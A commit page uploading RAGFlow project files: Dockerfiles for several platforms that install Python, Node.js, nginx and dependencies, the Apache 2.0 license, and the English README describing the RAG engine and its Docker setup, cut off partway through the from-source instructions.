jianglinzhang commited on
Commit
1192360
1 Parent(s): 8a44cb6

Upload 14 files

Browse files
Files changed (13) hide show
  1. Dockerfile.arm +43 -0
  2. Dockerfile.cuda +27 -0
  3. Dockerfile.scratch +56 -0
  4. Dockerfile.scratch.oc9 +58 -0
  5. LICENSE +201 -0
  6. README.md +342 -11
  7. README_ja.md +289 -0
  8. README_ko.md +325 -0
  9. README_zh.md +329 -0
  10. SECURITY.md +74 -0
  11. printEnvironment.sh +67 -0
  12. requirements.txt +104 -0
  13. requirements_arm.txt +175 -0
Dockerfile.arm ADDED
@@ -0,0 +1,43 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM python:3.11
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ COPY requirements_arm.txt /ragflow/requirements.txt
7
+
8
+
9
+ RUN pip install nltk --default-timeout=10000
10
+
11
+ RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
12
+ python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
13
+
14
+ RUN apt-get update && \
15
+ apt-get install -y curl gnupg && \
16
+ rm -rf /var/lib/apt/lists/*
17
+
18
+ RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
19
+ apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
20
+
21
+ RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
22
+ ENV PATH="/root/.cargo/bin:${PATH}"
23
+
24
+ RUN pip install graspologic
25
+
26
+ ADD ./web ./web
27
+ RUN cd ./web && npm i --force && npm run build
28
+
29
+ ADD ./api ./api
30
+ ADD ./conf ./conf
31
+ ADD ./deepdoc ./deepdoc
32
+ ADD ./rag ./rag
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ ENV PYTHONPATH=/ragflow/
37
+ ENV HF_ENDPOINT=https://hf-mirror.com
38
+
39
+ ADD docker/entrypoint.sh ./entrypoint.sh
40
+ ADD docker/.env ./
41
+ RUN chmod +x ./entrypoint.sh
42
+
43
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.cuda ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM infiniflow/ragflow-base:v2.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ ## for cuda > 12.0
7
+ RUN pip uninstall -y onnxruntime-gpu
8
+ RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
9
+
10
+
11
+ ADD ./web ./web
12
+ RUN cd ./web && npm i --force && npm run build
13
+
14
+ ADD ./api ./api
15
+ ADD ./conf ./conf
16
+ ADD ./deepdoc ./deepdoc
17
+ ADD ./rag ./rag
18
+ ADD ./agent ./agent
19
+ ADD ./graphrag ./graphrag
20
+
21
+ ENV PYTHONPATH=/ragflow/
22
+ ENV HF_ENDPOINT=https://hf-mirror.com
23
+
24
+ ADD docker/entrypoint.sh ./entrypoint.sh
25
+ RUN chmod +x ./entrypoint.sh
26
+
27
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.scratch ADDED
@@ -0,0 +1,56 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM ubuntu:22.04
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
23
+ RUN apt-get install -y nodejs
24
+
25
+ RUN apt-get install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./conf ./conf
30
+ ADD ./deepdoc ./deepdoc
31
+ ADD ./rag ./rag
32
+ ADD ./requirements.txt ./requirements.txt
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ RUN apt-get install -y openmpi-bin openmpi-common libopenmpi-dev
37
+ ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
38
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
39
+ RUN cd ./web && npm i --force && npm run build
40
+ RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
41
+
42
+ RUN apt-get update && \
43
+ apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
44
+ rm -rf /var/lib/apt/lists/*
45
+
46
+ RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
47
+ RUN conda run -n py11 python -m nltk.downloader punkt
48
+ RUN conda run -n py11 python -m nltk.downloader wordnet
49
+
50
+ ENV PYTHONPATH=/ragflow/
51
+ ENV HF_ENDPOINT=https://hf-mirror.com
52
+
53
+ ADD docker/entrypoint.sh ./entrypoint.sh
54
+ RUN chmod +x ./entrypoint.sh
55
+
56
+ ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.scratch.oc9 ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM opencloudos/opencloudos:9.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
23
+ RUN dnf install -y nodejs
24
+
25
+ RUN dnf install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./conf ./conf
30
+ ADD ./deepdoc ./deepdoc
31
+ ADD ./rag ./rag
32
+ ADD ./requirements.txt ./requirements.txt
33
+ ADD ./agent ./agent
34
+ ADD ./graphrag ./graphrag
35
+
36
+ RUN dnf install -y openmpi openmpi-devel python3-openmpi
37
+ ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
38
+ ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
39
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
40
+ RUN cd ./web && npm i --force && npm run build
41
+ RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
42
+ RUN conda run -n py11 pip install redis
43
+
44
+ RUN dnf update -y && \
45
+ dnf install -y glib2 mesa-libGL && \
46
+ dnf clean all
47
+
48
+ RUN conda run -n py11 pip install ollama
49
+ RUN conda run -n py11 python -m nltk.downloader punkt
50
+ RUN conda run -n py11 python -m nltk.downloader wordnet
51
+
52
+ ENV PYTHONPATH=/ragflow/
53
+ ENV HF_ENDPOINT=https://hf-mirror.com
54
+
55
+ ADD docker/entrypoint.sh ./entrypoint.sh
56
+ RUN chmod +x ./entrypoint.sh
57
+
58
+ ENTRYPOINT ["./entrypoint.sh"]
LICENSE ADDED
@@ -0,0 +1,201 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Apache License
2
+ Version 2.0, January 2004
3
+ http://www.apache.org/licenses/
4
+
5
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6
+
7
+ 1. Definitions.
8
+
9
+ "License" shall mean the terms and conditions for use, reproduction,
10
+ and distribution as defined by Sections 1 through 9 of this document.
11
+
12
+ "Licensor" shall mean the copyright owner or entity authorized by
13
+ the copyright owner that is granting the License.
14
+
15
+ "Legal Entity" shall mean the union of the acting entity and all
16
+ other entities that control, are controlled by, or are under common
17
+ control with that entity. For the purposes of this definition,
18
+ "control" means (i) the power, direct or indirect, to cause the
19
+ direction or management of such entity, whether by contract or
20
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
21
+ outstanding shares, or (iii) beneficial ownership of such entity.
22
+
23
+ "You" (or "Your") shall mean an individual or Legal Entity
24
+ exercising permissions granted by this License.
25
+
26
+ "Source" form shall mean the preferred form for making modifications,
27
+ including but not limited to software source code, documentation
28
+ source, and configuration files.
29
+
30
+ "Object" form shall mean any form resulting from mechanical
31
+ transformation or translation of a Source form, including but
32
+ not limited to compiled object code, generated documentation,
33
+ and conversions to other media types.
34
+
35
+ "Work" shall mean the work of authorship, whether in Source or
36
+ Object form, made available under the License, as indicated by a
37
+ copyright notice that is included in or attached to the work
38
+ (an example is provided in the Appendix below).
39
+
40
+ "Derivative Works" shall mean any work, whether in Source or Object
41
+ form, that is based on (or derived from) the Work and for which the
42
+ editorial revisions, annotations, elaborations, or other modifications
43
+ represent, as a whole, an original work of authorship. For the purposes
44
+ of this License, Derivative Works shall not include works that remain
45
+ separable from, or merely link (or bind by name) to the interfaces of,
46
+ the Work and Derivative Works thereof.
47
+
48
+ "Contribution" shall mean any work of authorship, including
49
+ the original version of the Work and any modifications or additions
50
+ to that Work or Derivative Works thereof, that is intentionally
51
+ submitted to Licensor for inclusion in the Work by the copyright owner
52
+ or by an individual or Legal Entity authorized to submit on behalf of
53
+ the copyright owner. For the purposes of this definition, "submitted"
54
+ means any form of electronic, verbal, or written communication sent
55
+ to the Licensor or its representatives, including but not limited to
56
+ communication on electronic mailing lists, source code control systems,
57
+ and issue tracking systems that are managed by, or on behalf of, the
58
+ Licensor for the purpose of discussing and improving the Work, but
59
+ excluding communication that is conspicuously marked or otherwise
60
+ designated in writing by the copyright owner as "Not a Contribution."
61
+
62
+ "Contributor" shall mean Licensor and any individual or Legal Entity
63
+ on behalf of whom a Contribution has been received by Licensor and
64
+ subsequently incorporated within the Work.
65
+
66
+ 2. Grant of Copyright License. Subject to the terms and conditions of
67
+ this License, each Contributor hereby grants to You a perpetual,
68
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69
+ copyright license to reproduce, prepare Derivative Works of,
70
+ publicly display, publicly perform, sublicense, and distribute the
71
+ Work and such Derivative Works in Source or Object form.
72
+
73
+ 3. Grant of Patent License. Subject to the terms and conditions of
74
+ this License, each Contributor hereby grants to You a perpetual,
75
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76
+ (except as stated in this section) patent license to make, have made,
77
+ use, offer to sell, sell, import, and otherwise transfer the Work,
78
+ where such license applies only to those patent claims licensable
79
+ by such Contributor that are necessarily infringed by their
80
+ Contribution(s) alone or by combination of their Contribution(s)
81
+ with the Work to which such Contribution(s) was submitted. If You
82
+ institute patent litigation against any entity (including a
83
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
84
+ or a Contribution incorporated within the Work constitutes direct
85
+ or contributory patent infringement, then any patent licenses
86
+ granted to You under this License for that Work shall terminate
87
+ as of the date such litigation is filed.
88
+
89
+ 4. Redistribution. You may reproduce and distribute copies of the
90
+ Work or Derivative Works thereof in any medium, with or without
91
+ modifications, and in Source or Object form, provided that You
92
+ meet the following conditions:
93
+
94
+ (a) You must give any other recipients of the Work or
95
+ Derivative Works a copy of this License; and
96
+
97
+ (b) You must cause any modified files to carry prominent notices
98
+ stating that You changed the files; and
99
+
100
+ (c) You must retain, in the Source form of any Derivative Works
101
+ that You distribute, all copyright, patent, trademark, and
102
+ attribution notices from the Source form of the Work,
103
+ excluding those notices that do not pertain to any part of
104
+ the Derivative Works; and
105
+
106
+ (d) If the Work includes a "NOTICE" text file as part of its
107
+ distribution, then any Derivative Works that You distribute must
108
+ include a readable copy of the attribution notices contained
109
+ within such NOTICE file, excluding those notices that do not
110
+ pertain to any part of the Derivative Works, in at least one
111
+ of the following places: within a NOTICE text file distributed
112
+ as part of the Derivative Works; within the Source form or
113
+ documentation, if provided along with the Derivative Works; or,
114
+ within a display generated by the Derivative Works, if and
115
+ wherever such third-party notices normally appear. The contents
116
+ of the NOTICE file are for informational purposes only and
117
+ do not modify the License. You may add Your own attribution
118
+ notices within Derivative Works that You distribute, alongside
119
+ or as an addendum to the NOTICE text from the Work, provided
120
+ that such additional attribution notices cannot be construed
121
+ as modifying the License.
122
+
123
+ You may add Your own copyright statement to Your modifications and
124
+ may provide additional or different license terms and conditions
125
+ for use, reproduction, or distribution of Your modifications, or
126
+ for any such Derivative Works as a whole, provided Your use,
127
+ reproduction, and distribution of the Work otherwise complies with
128
+ the conditions stated in this License.
129
+
130
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
131
+ any Contribution intentionally submitted for inclusion in the Work
132
+ by You to the Licensor shall be under the terms and conditions of
133
+ this License, without any additional terms or conditions.
134
+ Notwithstanding the above, nothing herein shall supersede or modify
135
+ the terms of any separate license agreement you may have executed
136
+ with Licensor regarding such Contributions.
137
+
138
+ 6. Trademarks. This License does not grant permission to use the trade
139
+ names, trademarks, service marks, or product names of the Licensor,
140
+ except as required for reasonable and customary use in describing the
141
+ origin of the Work and reproducing the content of the NOTICE file.
142
+
143
+ 7. Disclaimer of Warranty. Unless required by applicable law or
144
+ agreed to in writing, Licensor provides the Work (and each
145
+ Contributor provides its Contributions) on an "AS IS" BASIS,
146
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147
+ implied, including, without limitation, any warranties or conditions
148
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149
+ PARTICULAR PURPOSE. You are solely responsible for determining the
150
+ appropriateness of using or redistributing the Work and assume any
151
+ risks associated with Your exercise of permissions under this License.
152
+
153
+ 8. Limitation of Liability. In no event and under no legal theory,
154
+ whether in tort (including negligence), contract, or otherwise,
155
+ unless required by applicable law (such as deliberate and grossly
156
+ negligent acts) or agreed to in writing, shall any Contributor be
157
+ liable to You for damages, including any direct, indirect, special,
158
+ incidental, or consequential damages of any character arising as a
159
+ result of this License or out of the use or inability to use the
160
+ Work (including but not limited to damages for loss of goodwill,
161
+ work stoppage, computer failure or malfunction, or any and all
162
+ other commercial damages or losses), even if such Contributor
163
+ has been advised of the possibility of such damages.
164
+
165
+ 9. Accepting Warranty or Additional Liability. While redistributing
166
+ the Work or Derivative Works thereof, You may choose to offer,
167
+ and charge a fee for, acceptance of support, warranty, indemnity,
168
+ or other liability obligations and/or rights consistent with this
169
+ License. However, in accepting such obligations, You may act only
170
+ on Your own behalf and on Your sole responsibility, not on behalf
171
+ of any other Contributor, and only if You agree to indemnify,
172
+ defend, and hold each Contributor harmless for any liability
173
+ incurred by, or claims asserted against, such Contributor by reason
174
+ of your accepting any such warranty or additional liability.
175
+
176
+ END OF TERMS AND CONDITIONS
177
+
178
+ APPENDIX: How to apply the Apache License to your work.
179
+
180
+ To apply the Apache License to your work, attach the following
181
+ boilerplate notice, with the fields enclosed by brackets "[]"
182
+ replaced with your own identifying information. (Don't include
183
+ the brackets!) The text should be enclosed in the appropriate
184
+ comment syntax for the file format. We also recommend that a
185
+ file or class name and description of purpose be included on the
186
+ same "printed page" as the copyright notice for easier
187
+ identification within third-party archives.
188
+
189
+ Copyright [yyyy] [name of copyright owner]
190
+
191
+ Licensed under the Apache License, Version 2.0 (the "License");
192
+ you may not use this file except in compliance with the License.
193
+ You may obtain a copy of the License at
194
+
195
+ http://www.apache.org/licenses/LICENSE-2.0
196
+
197
+ Unless required by applicable law or agreed to in writing, software
198
+ distributed under the License is distributed on an "AS IS" BASIS,
199
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200
+ See the License for the specific language governing permissions and
201
+ limitations under the License.
README.md CHANGED
@@ -1,11 +1,342 @@
1
- ---
2
- title: Ragflow
3
- emoji: 🏃
4
- colorFrom: green
5
- colorTo: purple
6
- sdk: docker
7
- pinned: false
8
- license: apache-2.0
9
- ---
10
-
11
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+ <details open>
36
+ <summary><b>📕 Table of Contents</b></summary>
37
+
38
+ - 💡 [What is RAGFlow?](#-what-is-ragflow)
39
+ - 🎮 [Demo](#-demo)
40
+ - 🔥 [Latest Updates](#-latest-updates)
41
+ - 🌟 [Key Features](#-key-features)
42
+ - 🔎 [System Architecture](#-system-architecture)
43
+ - 🎬 [Get Started](#-get-started)
44
+ - 🔧 [Configurations](#-configurations)
45
+ - 🛠️ [Build from source](#-build-from-source)
46
+ - 🛠️ [Launch service from source](#-launch-service-from-source)
47
+ - 📚 [Documentation](#-documentation)
48
+ - 📜 [Roadmap](#-roadmap)
49
+ - 🏄 [Community](#-community)
50
+ - 🙌 [Contributing](#-contributing)
51
+
52
+ </details>
53
+
54
+ ## 💡 What is RAGFlow?
55
+
56
+ [RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLMs (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
57
+
58
+ ## 🎮 Demo
59
+
60
+ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
61
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
62
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
63
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
64
+ </div>
65
+
66
+
67
+ ## 🔥 Latest Updates
68
+
69
+ - 2024-09-13 Adds search mode for knowledge base Q&A.
70
+ - 2024-09-09 Adds a medical consultant agent template.
71
+ - 2024-08-22 Supports text-to-SQL statements through RAG.
72
+ - 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) and mind map.
73
+ - 2024-07-23 Supports audio file parsing.
74
+ - 2024-07-08 Supports workflow based on [Graph](./agent/README.md).
75
+ - 2024-06-27 Supports Markdown and Docx in the Q&A parsing method, extracting images from Docx files, extracting tables from Markdown files.
76
+ - 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
77
+
78
+
79
+ ## 🌟 Key Features
80
+
81
+ ### 🍭 **"Quality in, quality out"**
82
+
83
+ - [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
84
+ - Finds "needle in a data haystack" of literally unlimited tokens.
85
+
86
+ ### 🍱 **Template-based chunking**
87
+
88
+ - Intelligent and explainable.
89
+ - Plenty of template options to choose from.
90
+
91
+ ### 🌱 **Grounded citations with reduced hallucinations**
92
+
93
+ - Visualization of text chunking to allow human intervention.
94
+ - Quick view of the key references and traceable citations to support grounded answers.
95
+
96
+ ### 🍔 **Compatibility with heterogeneous data sources**
97
+
98
+ - Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.
99
+
100
+ ### 🛀 **Automated and effortless RAG workflow**
101
+
102
+ - Streamlined RAG orchestration catered to both personal and large businesses.
103
+ - Configurable LLMs as well as embedding models.
104
+ - Multiple recall paired with fused re-ranking.
105
+ - Intuitive APIs for seamless integration with business.
106
+
107
+ ## 🔎 System Architecture
108
+
109
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
110
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
111
+ </div>
112
+
113
+ ## 🎬 Get Started
114
+
115
+ ### 📝 Prerequisites
116
+
117
+ - CPU >= 4 cores
118
+ - RAM >= 16 GB
119
+ - Disk >= 50 GB
120
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
121
+ > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
122
+
123
+ ### 🚀 Start up the server
124
+
125
+ 1. Ensure `vm.max_map_count` >= 262144:
126
+
127
+ > To check the value of `vm.max_map_count`:
128
+ >
129
+ > ```bash
130
+ > $ sysctl vm.max_map_count
131
+ > ```
132
+ >
133
+ > Reset `vm.max_map_count` to a value at least 262144 if it is not.
134
+ >
135
+ > ```bash
136
+ > # In this case, we set it to 262144:
137
+ > $ sudo sysctl -w vm.max_map_count=262144
138
+ > ```
139
+ >
140
+ > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
141
+ >
142
+ > ```bash
143
+ > vm.max_map_count=262144
144
+ > ```
145
+
146
+ 2. Clone the repo:
147
+
148
+ ```bash
149
+ $ git clone https://github.com/infiniflow/ragflow.git
150
+ ```
151
+
152
+ 3. Pull the pre-built Docker images and start up the server:
153
+
154
+ > Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.
155
+
156
+ ```bash
157
+ $ cd ragflow/docker
158
+ $ chmod +x ./entrypoint.sh
159
+ $ docker compose up -d
160
+ ```
161
+
162
+
163
+ > The core image is about 9 GB in size and may take a while to load.
164
+
165
+ 4. Check the server status after having the server up and running:
166
+
167
+ ```bash
168
+ $ docker logs -f ragflow-server
169
+ ```
170
+
171
+ _The following output confirms a successful launch of the system:_
172
+
173
+ ```bash
174
+ ____ ______ __
175
+ / __ \ ____ _ ____ _ / ____// /____ _ __
176
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
177
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
178
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
179
+ /____/
180
+
181
+ * Running on all addresses (0.0.0.0)
182
+ * Running on http://127.0.0.1:9380
183
+ * Running on http://x.x.x.x:9380
184
+ INFO:werkzeug:Press CTRL+C to quit
185
+ ```
186
+ > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.
187
+
188
+ 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
189
+ > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
190
+ 6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
191
+
192
+ > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
193
+
194
+ _The show is now on!_
195
+
196
+ ## 🔧 Configurations
197
+
198
+ When it comes to system configurations, you will need to manage the following files:
199
+
200
+ - [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
201
+ - [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
202
+ - [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
203
+
204
+ You must ensure that changes to the [.env](./docker/.env) file are in line with what is in the [service_conf.yaml](./docker/service_conf.yaml) file.
205
+
206
+ > The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
207
+
208
+ To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
209
+
210
+ > Updates to any of the above configurations require restarting all containers to take effect:
211
+ >
212
+ > ```bash
213
+ > $ docker compose up -d
214
+ > ```
215
+
216
+ ## 🛠️ Build from source
217
+
218
+ To build the Docker images from source:
219
+
220
+ ```bash
221
+ $ git clone https://github.com/infiniflow/ragflow.git
222
+ $ cd ragflow/
223
+ $ docker build -t infiniflow/ragflow:dev .
224
+ $ cd docker
225
+ $ chmod +x ./entrypoint.sh
226
+ $ docker compose up -d
227
+ ```
228
+
229
+ ## 🛠️ Launch service from source
230
+
231
+ To launch the service from source:
232
+
233
+ 1. Clone the repository:
234
+
235
+ ```bash
236
+ $ git clone https://github.com/infiniflow/ragflow.git
237
+ $ cd ragflow/
238
+ ```
239
+
240
+ 2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
241
+
242
+ ```bash
243
+ $ conda create -n ragflow python=3.11.0
244
+ $ conda activate ragflow
245
+ $ pip install -r requirements.txt
246
+ ```
247
+
248
+ ```bash
249
+ # If your CUDA version is higher than 12.0, run the following additional commands:
250
